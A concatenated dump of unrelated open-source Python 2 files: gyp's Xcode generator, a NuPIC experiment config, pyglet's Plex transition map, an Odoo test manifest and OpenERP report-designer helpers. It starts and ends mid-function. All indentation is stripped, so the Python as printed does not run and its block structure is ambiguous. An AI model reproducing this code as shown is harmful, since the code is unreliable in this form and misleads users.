ssbp = gyp.xcodeproj_file.PBXShellScriptBuildPhase({
'inputPaths': action['inputs'],
'name': 'Action "' + action['action_name'] + '"',
'outputPaths': action['outputs'],
'shellScript': script,
'showEnvVarsInLog': 0,
})
if support_xct:
support_xct.AppendProperty('buildPhases', ssbp)
else:
# TODO(mark): this assumes too much knowledge of the internals of
# xcodeproj_file; some of these smarts should move into xcodeproj_file
# itself.
xct._properties['buildPhases'].insert(prebuild_index, ssbp)
prebuild_index = prebuild_index + 1
# TODO(mark): Should verify that at most one of these is specified.
if int(action.get('process_outputs_as_sources', False)):
for output in action['outputs']:
AddSourceToTarget(output, type, pbxp, xct)
if int(action.get('process_outputs_as_mac_bundle_resources', False)):
for output in action['outputs']:
AddResourceToTarget(output, pbxp, xct)
# tgt_mac_bundle_resources holds the list of bundle resources so
# the rule processing can check against it.
if is_bundle:
tgt_mac_bundle_resources = spec.get('mac_bundle_resources', [])
else:
tgt_mac_bundle_resources = []
# Add custom shell script phases driving "make" for "rules" sections.
#
# Xcode's built-in rule support is almost powerful enough to use directly,
# but there are a few significant deficiencies that render them unusable.
# There are workarounds for some of its inadequacies, but in aggregate,
# the workarounds added complexity to the generator, and some workarounds
# actually require input files to be crafted more carefully than I'd like.
# Consequently, until Xcode rules are made more capable, "rules" input
# sections will be handled in Xcode output by shell script build phases
# performed prior to the compilation phase.
#
# The following problems with Xcode rules were found. The numbers are
# Apple radar IDs. I hope that these shortcomings are addressed, I really
# liked having the rules handled directly in Xcode during the period that
# I was prototyping this.
#
# 6588600 Xcode compiles custom script rule outputs too soon, compilation
# fails. This occurs when rule outputs from distinct inputs are
# interdependent. The only workaround is to put rules and their
# inputs in a separate target from the one that compiles the rule
# outputs. This requires input file cooperation and it means that
# process_outputs_as_sources is unusable.
# 6584932 Need to declare that custom rule outputs should be excluded from
# compilation. A possible workaround is to lie to Xcode about a
# rule's output, giving it a dummy file it doesn't know how to
# compile. The rule action script would need to touch the dummy.
# 6584839 I need a way to declare additional inputs to a custom rule.
# A possible workaround is a shell script phase prior to
# compilation that touches a rule's primary input files if any
# would-be additional inputs are newer than the output. Modifying
# the source tree - even just modification times - feels dirty.
# 6564240 Xcode "custom script" build rules always dump all environment
# variables. This is a low-prioroty problem and is not a
# show-stopper.
rules_by_ext = {}
for rule in spec_rules:
rules_by_ext[rule['extension']] = rule
# First, some definitions:
#
# A "rule source" is a file that was listed in a target's "sources"
# list and will have a rule applied to it on the basis of matching the
# rule's "extensions" attribute. Rule sources are direct inputs to
# rules.
#
# Rule definitions may specify additional inputs in their "inputs"
# attribute. These additional inputs are used for dependency tracking
# purposes.
#
# A "concrete output" is a rule output with input-dependent variables
# resolved. For example, given a rule with:
# 'extension': 'ext', 'outputs': ['$(INPUT_FILE_BASE).cc'],
# if the target's "sources" list contained "one.ext" and "two.ext",
# the "concrete output" for rule input "two.ext" would be "two.cc". If
# a rule specifies multiple outputs, each input file that the rule is
# applied to will have the same number of concrete outputs.
#
# If any concrete outputs are outdated or missing relative to their
# corresponding rule_source or to any specified additional input, the
# rule action must be performed to generate the concrete outputs.
# concrete_outputs_by_rule_source will have an item at the same index
# as the rule['rule_sources'] that it corresponds to. Each item is a
# list of all of the concrete outputs for the rule_source.
concrete_outputs_by_rule_source = []
# concrete_outputs_all is a flat list of all concrete outputs that this
# rule is able to produce, given the known set of input files
# (rule_sources) that apply to it.
concrete_outputs_all = []
# messages & actions are keyed by the same indices as rule['rule_sources']
# and concrete_outputs_by_rule_source. They contain the message and
# action to perform after resolving input-dependent variables. The
# message is optional, in which case None is stored for each rule source.
messages = []
actions = []
for rule_source in rule.get('rule_sources', []):
rule_source_dirname, rule_source_basename = \
posixpath.split(rule_source)
(rule_source_root, rule_source_ext) = \
posixpath.splitext(rule_source_basename)
# These are the same variable names that Xcode uses for its own native
# rule support. Because Xcode's rule engine is not being used, they
# need to be expanded as they are written to the makefile.
rule_input_dict = {
'INPUT_FILE_BASE': rule_source_root,
'INPUT_FILE_SUFFIX': rule_source_ext,
'INPUT_FILE_NAME': rule_source_basename,
'INPUT_FILE_PATH': rule_source,
'INPUT_FILE_DIRNAME': rule_source_dirname,
}
concrete_outputs_for_this_rule_source = []
for output in rule.get('outputs', []):
# Fortunately, Xcode and make both use $(VAR) format for their
# variables, so the expansion is the only transformation necessary.
# Any remaning $(VAR)-type variables in the string can be given
# directly to make, which will pick up the correct settings from
# what Xcode puts into the environment.
concrete_output = ExpandXcodeVariables(output, rule_input_dict)
concrete_outputs_for_this_rule_source.append(concrete_output)
# Add all concrete outputs to the project.
pbxp.AddOrGetFileInRootGroup(concrete_output)
concrete_outputs_by_rule_source.append( \
concrete_outputs_for_this_rule_source)
concrete_outputs_all.extend(concrete_outputs_for_this_rule_source)
# TODO(mark): Should verify that at most one of these is specified.
if int(rule.get('process_outputs_as_sources', False)):
for output in concrete_outputs_for_this_rule_source:
AddSourceToTarget(output, type, pbxp, xct)
# If the file came from the mac_bundle_resources list or if the rule
# is marked to process outputs as bundle resource, do so.
was_mac_bundle_resource = rule_source in tgt_mac_bundle_resources
if was_mac_bundle_resource or \
int(rule.get('process_outputs_as_mac_bundle_resources', False)):
for output in concrete_outputs_for_this_rule_source:
AddResourceToTarget(output, pbxp, xct)
# Do we have a message to print when this rule runs?
message = rule.get('message')
if message:
message = gyp.common.EncodePOSIXShellArgument(message)
message = ExpandXcodeVariables(message, rule_input_dict)
messages.append(message)
# Turn the list into a string that can be passed to a shell.
action_string = gyp.common.EncodePOSIXShellList(rule['action'])
action = ExpandXcodeVariables(action_string, rule_input_dict)
actions.append(action)
if len(concrete_outputs_all) > 0:
# TODO(mark): There's a possibilty for collision here. Consider
# target "t" rule "A_r" and target "t_A" rule "r".
makefile_name = '%s.make' % re.sub(
'[^a-zA-Z0-9_]', '_' , '%s_%s' % (target_name, rule['rule_name']))
makefile_path = os.path.join(xcode_projects[build_file].path,
makefile_name)
# TODO(mark): try/close? Write to a temporary file and swap it only
# if it's got changes?
makefile = open(makefile_path, 'wb')
# make will build the first target in the makefile by default. By
# convention, it's called "all". List all (or at least one)
# concrete output for each rule source as a prerequisite of the "all"
# target.
makefile.write('all: \\\n')
for concrete_output_index in \
xrange(0, len(concrete_outputs_by_rule_source)):
# Only list the first (index [0]) concrete output of each input
# in the "all" target. Otherwise, a parallel make (-j > 1) would
# attempt to process each input multiple times simultaneously.
# Otherwise, "all" could just contain the entire list of
# concrete_outputs_all.
concrete_output = \
concrete_outputs_by_rule_source[concrete_output_index][0]
if concrete_output_index == len(concrete_outputs_by_rule_source) - 1:
eol = ''
else:
eol = ' \\'
makefile.write(' %s%s\n' % (concrete_output, eol))
for (rule_source, concrete_outputs, message, action) in \
zip(rule['rule_sources'], concrete_outputs_by_rule_source,
messages, actions):
makefile.write('\n')
# Add a rule that declares it can build each concrete output of a
# rule source. Collect the names of the directories that are
# required.
concrete_output_dirs = []
for concrete_output_index in xrange(0, len(concrete_outputs)):
concrete_output = concrete_outputs[concrete_output_index]
if concrete_output_index == 0:
bol = ''
else:
bol = ' '
makefile.write('%s%s \\\n' % (bol, concrete_output))
concrete_output_dir = posixpath.dirname(concrete_output)
if (concrete_output_dir and
concrete_output_dir not in concrete_output_dirs):
concrete_output_dirs.append(concrete_output_dir)
makefile.write(' : \\\n')
# The prerequisites for this rule are the rule source itself and
# the set of additional rule inputs, if any.
prerequisites = [rule_source]
prerequisites.extend(rule.get('inputs', []))
for prerequisite_index in xrange(0, len(prerequisites)):
prerequisite = prerequisites[prerequisite_index]
if prerequisite_index == len(prerequisites) - 1:
eol = ''
else:
eol = ' \\'
makefile.write(' %s%s\n' % (prerequisite, eol))
# Make sure that output directories exist before executing the rule
# action.
if len(concrete_output_dirs) > 0:
makefile.write('\t@mkdir -p "%s"\n' %
'" "'.join(concrete_output_dirs))
# The rule message and action have already had the necessary variable
# substitutions performed.
if message:
# Mark it with note: so Xcode picks it up in build output.
makefile.write('\t@echo note: %s\n' % message)
makefile.write('\t%s\n' % action)
makefile.close()
# It might be nice to ensure that needed output directories exist
# here rather than in each target in the Makefile, but that wouldn't
# work if there ever was a concrete output that had an input-dependent
# variable anywhere other than in the leaf position.
# Don't declare any inputPaths or outputPaths. If they're present,
# Xcode will provide a slight optimization by only running the script
# phase if any output is missing or outdated relative to any input.
# Unfortunately, it will also assume that all outputs are touched by
# the script, and if the outputs serve as files in a compilation
# phase, they will be unconditionally rebuilt. Since make might not
# rebuild everything that could be declared here as an output, this
# extra compilation activity is unnecessary. With inputPaths and
# outputPaths not supplied, make will always be called, but it knows
# enough to not do anything when everything is up-to-date.
# To help speed things up, pass -j COUNT to make so it does some work
# in parallel. Don't use ncpus because Xcode will build ncpus targets
# in parallel and if each target happens to have a rules step, there
# would be ncpus^2 things going. With a machine that has 2 quad-core
# Xeons, a build can quickly run out of processes based on
# scheduling/other tasks, and randomly failing builds are no good.
script = \
"""JOB_COUNT="$(/usr/sbin/sysctl -n hw.ncpu)"
if [ "${JOB_COUNT}" -gt 4 ]; then
JOB_COUNT=4
fi
exec xcrun make -f "${PROJECT_FILE_PATH}/%s" -j "${JOB_COUNT}"
exit 1
""" % makefile_name
ssbp = gyp.xcodeproj_file.PBXShellScriptBuildPhase({
'name': 'Rule "' + rule['rule_name'] + '"',
'shellScript': script,
'showEnvVarsInLog': 0,
})
if support_xct:
support_xct.AppendProperty('buildPhases', ssbp)
else:
# TODO(mark): this assumes too much knowledge of the internals of
# xcodeproj_file; some of these smarts should move into xcodeproj_file
# itself.
xct._properties['buildPhases'].insert(prebuild_index, ssbp)
prebuild_index = prebuild_index + 1
# Extra rule inputs also go into the project file. Concrete outputs were
# already added when they were computed.
groups = ['inputs', 'inputs_excluded']
if skip_excluded_files:
groups = [x for x in groups if not x.endswith('_excluded')]
for group in groups:
for item in rule.get(group, []):
pbxp.AddOrGetFileInRootGroup(item)
# Add "sources".
for source in spec.get('sources', []):
(source_root, source_extension) = posixpath.splitext(source)
if source_extension[1:] not in rules_by_ext:
# AddSourceToTarget will add the file to a root group if it's not
# already there.
AddSourceToTarget(source, type, pbxp, xct)
else:
pbxp.AddOrGetFileInRootGroup(source)
# Add "mac_bundle_resources" and "mac_framework_private_headers" if
# it's a bundle of any type.
if is_bundle:
for resource in tgt_mac_bundle_resources:
(resource_root, resource_extension) = posixpath.splitext(resource)
if resource_extension[1:] not in rules_by_ext:
AddResourceToTarget(resource, pbxp, xct)
else:
pbxp.AddOrGetFileInRootGroup(resource)
for header in spec.get('mac_framework_private_headers', []):
AddHeaderToTarget(header, pbxp, xct, False)
# Add "mac_framework_headers". These can be valid for both frameworks
# and static libraries.
if is_bundle or type == 'static_library':
for header in spec.get('mac_framework_headers', []):
AddHeaderToTarget(header, pbxp, xct, True)
# Add "copies".
pbxcp_dict = {}
for copy_group in spec.get('copies', []):
dest = copy_group['destination']
if dest[0] not in ('/', '$'):
# Relative paths are relative to $(SRCROOT).
dest = '$(SRCROOT)/' + dest
# Coalesce multiple "copies" sections in the same target with the same
# "destination" property into the same PBXCopyFilesBuildPhase, otherwise
# they'll wind up with ID collisions.
pbxcp = pbxcp_dict.get(dest, None)
if pbxcp is None:
pbxcp = gyp.xcodeproj_file.PBXCopyFilesBuildPhase({
'name': 'Copy to ' + copy_group['destination']
},
parent=xct)
pbxcp.SetDestination(dest)
# TODO(mark): The usual comment about this knowing too much about
# gyp.xcodeproj_file internals applies.
xct._properties['buildPhases'].insert(prebuild_index, pbxcp)
pbxcp_dict[dest] = pbxcp
for file in copy_group['files']:
pbxcp.AddFile(file)
# Excluded files can also go into the project file.
if not skip_excluded_files:
for key in ['sources', 'mac_bundle_resources', 'mac_framework_headers',
'mac_framework_private_headers']:
excluded_key = key + '_excluded'
for item in spec.get(excluded_key, []):
pbxp.AddOrGetFileInRootGroup(item)
# So can "inputs" and "outputs" sections of "actions" groups.
groups = ['inputs', 'inputs_excluded', 'outputs', 'outputs_excluded']
if skip_excluded_files:
groups = [x for x in groups if not x.endswith('_excluded')]
for action in spec.get('actions', []):
for group in groups:
for item in action.get(group, []):
# Exclude anything in BUILT_PRODUCTS_DIR. They're products, not
# sources.
if not item.startswith('$(BUILT_PRODUCTS_DIR)/'):
pbxp.AddOrGetFileInRootGroup(item)
for postbuild in spec.get('postbuilds', []):
action_string_sh = gyp.common.EncodePOSIXShellList(postbuild['action'])
script = 'exec ' + action_string_sh + '\nexit 1\n'
# Make the postbuild step depend on the output of ld or ar from this
# target. Apparently putting the script step after the link step isn't
# sufficient to ensure proper ordering in all cases. With an input
# declared but no outputs, the script step should run every time, as
# desired.
ssbp = gyp.xcodeproj_file.PBXShellScriptBuildPhase({
'inputPaths': ['$(BUILT_PRODUCTS_DIR)/$(EXECUTABLE_PATH)'],
'name': 'Postbuild "' + postbuild['postbuild_name'] + '"',
'shellScript': script,
'showEnvVarsInLog': 0,
})
xct.AppendProperty('buildPhases', ssbp)
# Add dependencies before libraries, because adding a dependency may imply
# adding a library. It's preferable to keep dependencies listed first
# during a link phase so that they can override symbols that would
# otherwise be provided by libraries, which will usually include system
# libraries. On some systems, ld is finicky and even requires the
# libraries to be ordered in such a way that unresolved symbols in
# earlier-listed libraries may only be resolved by later-listed libraries.
# The Mac linker doesn't work that way, but other platforms do, and so
# their linker invocations need to be constructed in this way. There's
# no compelling reason for Xcode's linker invocations to differ.
if 'dependencies' in spec:
for dependency in spec['dependencies']:
xct.AddDependency(xcode_targets[dependency])
# The support project also gets the dependencies (in case they are
# needed for the actions/rules to work).
if support_xct:
support_xct.AddDependency(xcode_targets[dependency])
if 'libraries' in spec:
for library in spec['libraries']:
xct.FrameworksPhase().AddFile(library)
# Add the library's directory to LIBRARY_SEARCH_PATHS if necessary.
# I wish Xcode handled this automatically.
library_dir = posixpath.dirname(library)
if library_dir not in xcode_standard_library_dirs and (
not xct.HasBuildSetting(_library_search_paths_var) or
library_dir not in xct.GetBuildSetting(_library_search_paths_var)):
xct.AppendBuildSetting(_library_search_paths_var, library_dir)
for configuration_name in configuration_names:
configuration = spec['configurations'][configuration_name]
xcbc = xct.ConfigurationNamed(configuration_name)
for include_dir in configuration.get('mac_framework_dirs', []):
xcbc.AppendBuildSetting('FRAMEWORK_SEARCH_PATHS', include_dir)
for include_dir in configuration.get('include_dirs', []):
xcbc.AppendBuildSetting('HEADER_SEARCH_PATHS', include_dir)
for library_dir in configuration.get('library_dirs', []):
if library_dir not in xcode_standard_library_dirs and (
not xcbc.HasBuildSetting(_library_search_paths_var) or
library_dir not in xcbc.GetBuildSetting(_library_search_paths_var)):
xcbc.AppendBuildSetting(_library_search_paths_var, library_dir)
if 'defines' in configuration:
for define in configuration['defines']:
set_define = EscapeXcodeDefine(define)
xcbc.AppendBuildSetting('GCC_PREPROCESSOR_DEFINITIONS', set_define)
if 'xcode_settings' in configuration:
for xck, xcv in configuration['xcode_settings'].iteritems():
xcbc.SetBuildSetting(xck, xcv)
if 'xcode_config_file' in configuration:
config_ref = pbxp.AddOrGetFileInRootGroup(
configuration['xcode_config_file'])
xcbc.SetBaseConfiguration(config_ref)
build_files = []
for build_file, build_file_dict in data.iteritems():
if build_file.endswith('.gyp'):
build_files.append(build_file)
for build_file in build_files:
xcode_projects[build_file].Finalize1(xcode_targets, serialize_all_tests)
for build_file in build_files:
xcode_projects[build_file].Finalize2(xcode_targets,
xcode_target_to_target_dict)
for build_file in build_files:
xcode_projects[build_file].Write()
|
pulinagrawal/nupic
|
refs/heads/master
|
examples/opf/experiments/classification/scalar_TP_0/description.py
|
2
|
# ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2013, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
## This file defines parameters for a prediction experiment.
import os
from nupic.frameworks.opf.expdescriptionhelpers import importBaseDescription
# the sub-experiment configuration
config = \
{ 'claEvalClassification': True,
'dataSource': 'file://' + os.path.join(os.path.dirname(__file__),
'../datasets/scalar_TP_0.csv'),
'modelParams': { 'clParams': { 'verbosity': 0},
'sensorParams': { 'encoders': { }, 'verbosity': 0},
'spParams': { },
'tmEnable': True,
'tmParams': { }}}
mod = importBaseDescription('../base_scalar/description.py', config)
locals().update(mod.__dict__)
|
ardekantur/pyglet
|
refs/heads/master
|
contrib/layout/layout/Plex/Transitions.py
|
30
|
#
# Plex - Transition Maps
#
# This version represents state sets direcly as dicts
# for speed.
#
from copy import copy
import string
from sys import maxint
from types import TupleType
class TransitionMap:
"""
A TransitionMap maps an input event to a set of states.
An input event is one of: a range of character codes,
the empty string (representing an epsilon move), or one
of the special symbols BOL, EOL, EOF.
For characters, this implementation compactly represents
the map by means of a list:
[code_0, states_0, code_1, states_1, code_2, states_2,
..., code_n-1, states_n-1, code_n]
where |code_i| is a character code, and |states_i| is a
set of states corresponding to characters with codes |c|
in the range |code_i| <= |c| <= |code_i+1|.
The following invariants hold:
n >= 1
code_0 == -maxint
code_n == maxint
code_i < code_i+1 for i in 0..n-1
states_0 == states_n-1
Mappings for the special events '', BOL, EOL, EOF are
kept separately in a dictionary.
"""
map = None # The list of codes and states
special = None # Mapping for special events
def __init__(self, map = None, special = None):
if not map:
map = [-maxint, {}, maxint]
if not special:
special = {}
self.map = map
self.special = special
#self.check() ###
def add(self, event, new_state,
TupleType = TupleType):
"""
Add transition to |new_state| on |event|.
"""
if type(event) == TupleType:
code0, code1 = event
i = self.split(code0)
j = self.split(code1)
map = self.map
while i < j:
map[i + 1][new_state] = 1
i = i + 2
else:
self.get_special(event)[new_state] = 1
def add_set(self, event, new_set,
TupleType = TupleType):
"""
Add transitions to the states in |new_set| on |event|.
"""
if type(event) == TupleType:
code0, code1 = event
i = self.split(code0)
j = self.split(code1)
map = self.map
while i < j:
map[i + 1].update(new_set)
i = i + 2
else:
self.get_special(event).update(new_set)
def get_epsilon(self,
none = None):
"""
Return the mapping for epsilon, or None.
"""
return self.special.get('', none)
def items(self,
len = len):
"""
Return the mapping as a list of ((code1, code2), state_set) and
(special_event, state_set) pairs.
"""
result = []
map = self.map
else_set = map[1]
i = 0
n = len(map) - 1
code0 = map[0]
while i < n:
set = map[i + 1]
code1 = map[i + 2]
if set or else_set:
result.append(((code0, code1), set))
code0 = code1
i = i + 2
for event, set in self.special.items():
if set:
result.append((event, set))
return result
# ------------------- Private methods --------------------
def split(self, code,
len = len, maxint = maxint):
"""
Search the list for the position of the split point for |code|,
inserting a new split point if necessary. Returns index |i| such
that |code| == |map[i]|.
"""
# We use a funky variation on binary search.
map = self.map
hi = len(map) - 1
# Special case: code == map[-1]
if code == maxint:
return hi
# General case
lo = 0
# loop invariant: map[lo] <= code < map[hi] and hi - lo >= 2
while hi - lo >= 4:
# Find midpoint truncated to even index
mid = ((lo + hi) / 2) & ~1
if code < map[mid]:
hi = mid
else:
lo = mid
# map[lo] <= code < map[hi] and hi - lo == 2
if map[lo] == code:
return lo
else:
map[hi:hi] = [code, map[hi - 1].copy()]
#self.check() ###
return hi
def get_special(self, event):
"""
Get state set for special event, adding a new entry if necessary.
"""
special = self.special
set = special.get(event, None)
if not set:
set = {}
special[event] = set
return set
# --------------------- Conversion methods -----------------------
def __str__(self):
map_strs = []
map = self.map
n = len(map)
i = 0
while i < n:
code = map[i]
if code == -maxint:
code_str = "-inf"
elif code == maxint:
code_str = "inf"
else:
code_str = str(code)
map_strs.append(code_str)
i = i + 1
if i < n:
map_strs.append(state_set_str(map[i]))
i = i + 1
special_strs = {}
for event, set in self.special.items():
special_strs[event] = state_set_str(set)
return "[%s]+%s" % (
string.join(map_strs, ","),
special_strs
)
# --------------------- Debugging methods -----------------------
def check(self):
"""Check data structure integrity."""
if not self.map[-3] < self.map[-1]:
print self
assert 0
def dump(self, file):
map = self.map
i = 0
n = len(map) - 1
while i < n:
self.dump_range(map[i], map[i + 2], map[i + 1], file)
i = i + 2
for event, set in self.special.items():
if set:
if not event:
event = 'empty'
self.dump_trans(event, set, file)
def dump_range(self, code0, code1, set, file):
if set:
if code0 == -maxint:
if code1 == maxint:
k = "any"
else:
k = "< %s" % self.dump_char(code1)
elif code1 == maxint:
k = "> %s" % self.dump_char(code0 - 1)
elif code0 == code1 - 1:
k = self.dump_char(code0)
else:
k = "%s..%s" % (self.dump_char(code0),
self.dump_char(code1 - 1))
self.dump_trans(k, set, file)
def dump_char(self, code):
if 0 <= code <= 255:
return repr(chr(code))
else:
return "chr(%d)" % code
def dump_trans(self, key, set, file):
file.write(" %s --> %s\n" % (key, self.dump_set(set)))
def dump_set(self, set):
return state_set_str(set)
#
# State set manipulation functions
#
#def merge_state_sets(set1, set2):
# for state in set2.keys():
# set1[state] = 1
def state_set_str(set):
state_list = set.keys()
str_list = []
for state in state_list:
str_list.append("S%d" % state.number)
return "[%s]" % string.join(str_list, ",")
|
savoirfairelinux/connector-interfaces
|
refs/heads/8.0
|
test_base_import_async/__openerp__.py
|
2
|
# -*- coding: utf-8 -*-
###############################################################################
#
# Module for OpenERP
# Copyright (C) 2014 ACSONE SA/NV (http://acsone.eu).
# @author Stéphane Bidoul <stephane.bidoul@acsone.eu>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
{
'name': 'Test suite for base_import_async',
'version': '1.0',
'author': 'ACSONE SA/NV, Odoo Community Association (OCA)',
'license': 'AGPL-3',
'category': 'Generic Modules',
'description': """Test suite for base_import_async.
Normally you don't need to install this.
""",
'depends': [
'base_import_async',
'account',
],
'installable': True,
'application': False,
}
|
Gitlab11/odoo
|
refs/heads/8.0
|
addons/base_report_designer/plugin/openerp_report_designer/bin/script/lib/functions.py
|
292
|
##########################################################################
#
# Copyright (c) 2003-2004 Danny Brewer d29583@groovegarden.com
# Copyright (C) 2004-2010 OpenERP SA (<http://openerp.com>).
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
# See: http://www.gnu.org/licenses/lgpl.html
#
##############################################################################
import uno
import xmlrpclib
import re
import socket
import cPickle
import marshal
import tempfile
if __name__<>"package":
from gui import *
from logreport import *
from rpc import *
database="test"
uid = 1
def genTree(object, aList, insField, host, level=3, ending=None, ending_excl=None, recur=None, root='', actualroot=""):
if ending is None:
ending = []
if ending_excl is None:
ending_excl = []
if recur is None:
recur = []
try:
global url
sock=RPCSession(url)
global passwd
res = sock.execute(database, uid, passwd, object , 'fields_get')
key = res.keys()
key.sort()
for k in key:
if (not ending or res[k]['type'] in ending) and ((not ending_excl) or not (res[k]['type'] in ending_excl)):
insField.addItem(root+'/'+res[k]["string"],len(aList))
aList.append(actualroot+'/'+k)
if (res[k]['type'] in recur) and (level>0):
genTree(res[k]['relation'],aList,insField,host ,level-1, ending, ending_excl, recur,root+'/'+res[k]["string"],actualroot+'/'+k)
except:
obj=Logger()
import traceback,sys
info = reduce(lambda x, y: x+y, traceback.format_exception(sys.exc_type, sys.exc_value, sys.exc_traceback))
obj.log_write('Function', LOG_ERROR, info)
def VariableScope(oTcur, insVariable, aObjectList, aComponentAdd, aItemList, sTableName=""):
if sTableName.find(".") != -1:
for i in range(len(aItemList)):
if aComponentAdd[i]==sTableName:
sLVal=aItemList[i][1][aItemList[i][1].find(",'")+2:aItemList[i][1].find("')")]
for j in range(len(aObjectList)):
if aObjectList[j][:aObjectList[j].find("(")] == sLVal:
insVariable.append(aObjectList[j])
VariableScope(oTcur,insVariable,aObjectList,aComponentAdd,aItemList, sTableName[:sTableName.rfind(".")])
else:
for i in range(len(aItemList)):
if aComponentAdd[i]==sTableName:
sLVal=aItemList[i][1][aItemList[i][1].find(",'")+2:aItemList[i][1].find("')")]
for j in range(len(aObjectList)):
if aObjectList[j][:aObjectList[j].find("(")] == sLVal and sLVal!="":
insVariable.append(aObjectList[j])
def getList(aObjectList, host, count):
desktop=getDesktop()
doc =desktop.getCurrentComponent()
docinfo=doc.getDocumentInfo()
sMain=""
if not count == 0:
if count >= 1:
oParEnum = doc.getTextFields().createEnumeration()
while oParEnum.hasMoreElements():
oPar = oParEnum.nextElement()
if oPar.supportsService("com.sun.star.text.TextField.DropDown"):
sItem=oPar.Items[1]
if sItem[sItem.find("(")+1:sItem.find(",")]=="objects":
sMain = sItem[sItem.find(",'")+2:sItem.find("')")]
oParEnum = doc.getTextFields().createEnumeration()
while oParEnum.hasMoreElements():
oPar = oParEnum.nextElement()
if oPar.supportsService("com.sun.star.text.TextField.DropDown"):
sItem=oPar.Items[1]
if sItem[sItem.find("[[ ")+3:sItem.find("(")]=="repeatIn":
if sItem[sItem.find("(")+1:sItem.find(",")]=="objects":
aObjectList.append(sItem[sItem.rfind(",'")+2:sItem.rfind("')")] + "(" + docinfo.getUserFieldValue(3) + ")")
else:
sTemp=sItem[sItem.find("(")+1:sItem.find(",")]
if sMain == sTemp[:sTemp.find(".")]:
getRelation(docinfo.getUserFieldValue(3), sItem[sItem.find(".")+1:sItem.find(",")], sItem[sItem.find(",'")+2:sItem.find("')")],aObjectList,host)
else:
sPath=getPath(sItem[sItem.find("(")+1:sItem.find(",")], sMain)
getRelation(docinfo.getUserFieldValue(3), sPath, sItem[sItem.find(",'")+2:sItem.find("')")],aObjectList,host)
else:
aObjectList.append("List of " + docinfo.getUserFieldValue(3))
def getRelation(sRelName, sItem, sObjName, aObjectList, host):
global url
sock=RPCSession(url)
global passwd
res = sock.execute(database, uid, passwd, sRelName , 'fields_get')
key = res.keys()
for k in key:
if sItem.find(".") == -1:
if k == sItem:
aObjectList.append(sObjName + "(" + res[k]['relation'] + ")")
return 0
if k == sItem[:sItem.find(".")]:
getRelation(res[k]['relation'], sItem[sItem.find(".")+1:], sObjName,aObjectList,host)
def getPath(sPath, sMain):
desktop=getDesktop()
doc =desktop.getCurrentComponent()
oParEnum = doc.getTextFields().createEnumeration()
while oParEnum.hasMoreElements():
oPar = oParEnum.nextElement()
if oPar.supportsService("com.sun.star.text.TextField.DropDown"):
sItem=oPar.Items[1]
if sPath[:sPath.find(".")] == sMain:
break;
else:
res = re.findall('\\[\\[ *([a-zA-Z0-9_\.]+) *\\]\\]',sPath)
if len(res) <> 0:
if sItem[sItem.find(",'")+2:sItem.find("')")] == sPath[:sPath.find(".")]:
sPath = sItem[sItem.find("(")+1:sItem.find(",")] + sPath[sPath.find("."):]
getPath(sPath, sMain)
return sPath
def EnumDocument(aItemList, aComponentAdd):
desktop = getDesktop()
parent=""
bFlag = False
Doc =desktop.getCurrentComponent()
#oVC = Doc.CurrentController.getViewCursor()
oParEnum = Doc.getTextFields().createEnumeration()
while oParEnum.hasMoreElements():
oPar = oParEnum.nextElement()
if oPar.Anchor.TextTable:
#parent = oPar.Anchor.TextTable.Name
getChildTable(oPar.Anchor.TextTable,aItemList,aComponentAdd)
elif oPar.Anchor.TextSection:
parent = oPar.Anchor.TextSection.Name
elif oPar.Anchor.Text:
parent = "Document"
sItem=oPar.Items[1].replace(' ',"")
if sItem[sItem.find("[[ ")+3:sItem.find("(")]=="repeatIn" and not oPar.Items in aItemList:
templist=oPar.Items[0],sItem
aItemList.append( templist )
aComponentAdd.append( parent )
def getChildTable(oPar, aItemList, aComponentAdd, sTableName=""):
sNames = oPar.getCellNames()
bEmptyTableFlag=True
for val in sNames:
oCell = oPar.getCellByName(val)
oCurEnum = oCell.createEnumeration()
while oCurEnum.hasMoreElements():
try:
oCur = oCurEnum.nextElement()
if oCur.supportsService("com.sun.star.text.TextTable"):
if sTableName=="":
getChildTable(oCur,aItemList,aComponentAdd,oPar.Name)
else:
getChildTable(oCur,aItemList,aComponentAdd,sTableName+"."+oPar.Name)
else:
oSecEnum = oCur.createEnumeration()
while oSecEnum.hasMoreElements():
oSubSection = oSecEnum.nextElement()
if oSubSection.supportsService("com.sun.star.text.TextField"):
bEmptyTableFlag=False
sItem=oSubSection.TextField.Items[1]
if sItem[sItem.find("[[ ")+3:sItem.find("(")]=="repeatIn":
if aItemList.__contains__(oSubSection.TextField.Items)==False:
aItemList.append(oSubSection.TextField.Items)
if sTableName=="":
if aComponentAdd.__contains__(oPar.Name)==False:
aComponentAdd.append(oPar.Name)
else:
if aComponentAdd.__contains__(sTableName+"."+oPar.Name)==False:
aComponentAdd.append(sTableName+"."+oPar.Name)
except:
obj=Logger()
import traceback,sys
info = reduce(lambda x, y: x+y, traceback.format_exception(sys.exc_type, sys.exc_value, sys.exc_traceback))
obj.log_write('Function', LOG_ERROR, info)
if bEmptyTableFlag==True:
aItemList.append((u'',u''))
if sTableName=="":
